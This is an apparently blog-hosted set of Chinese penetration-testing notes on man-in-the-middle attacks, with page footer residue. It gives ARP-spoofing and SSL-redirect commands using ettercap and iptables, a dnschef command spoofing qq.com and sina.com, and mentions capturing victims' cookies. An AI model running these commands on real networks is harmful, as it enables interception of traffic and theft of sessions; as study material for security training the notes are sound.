【渗透测试笔记】之【中间人攻击】

ARP 欺骗

  1. 启动路由转发
sysctl -w net.ipv4.ip_forward=1
  1. ARP 欺骗在这里插入图片描述
  2. 打开WIRESHARK 运行并过滤想要抓取的协议
    在这里插入图片描述
    抓取到的Cookie:
    在这里插入图片描述

DNS 欺骗

前提:目标DNS服务器指向你

dnschef --fakeip=180.101.49.11 --fakedomains=www.qq.com,www.sina.com --interface 192.168.2.106 -q
# fakeip:希望受害者访问的地址
# fakedomains:要欺骗的域名
# interface:本机地址

强大的Ettercap

目标格式

MAC/IPV4/IPv6/Pors
00:11:11:11:11:11:11:11/192.168.2.1//

ARP 欺骗

ettercap -Tq -M arp:remote -i eth0 /192.168.2.102// /192.168.2.1//

T:文本模式
q:安静模式
remote:双向欺骗
在这里插入图片描述

SSl 欺骗

需要先将iptables 打开

vi /etc/ettercap/etter.conf
#---------------
#     Linux 
#---------------

# if you use ipchains:
   #redir_command_on = "ipchains -A input -i %iface -p tcp -s %source -d %destination %port -j REDIRECT %rport"
   #redir_command_off = "ipchains -D input -i %iface -p tcp -s %source -d %destination %port -j REDIRECT %rport"

# if you use iptables:
   redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp -s %source -d %destination --dport %port -j REDIRECT --to-port %rport"
   redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp -s %source -d %destination --dport %port -j REDIRECT --to-port %rport"

# pendant for IPv6 - Note that you need iptables v1.4.16 or newer to use IPv6 redirect
   #redir6_command_on = "ip6tables -t nat -A PREROUTING -i %iface -p tcp -s %source -d %destination --dport %port -j REDIRECT --to-port %rport"
   #redir6_command_off = "ip6tables -t nat -D PREROUTING -i %iface -p tcp -s %source -d %destination --dport %port -j REDIRECT --to-port %rport"
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值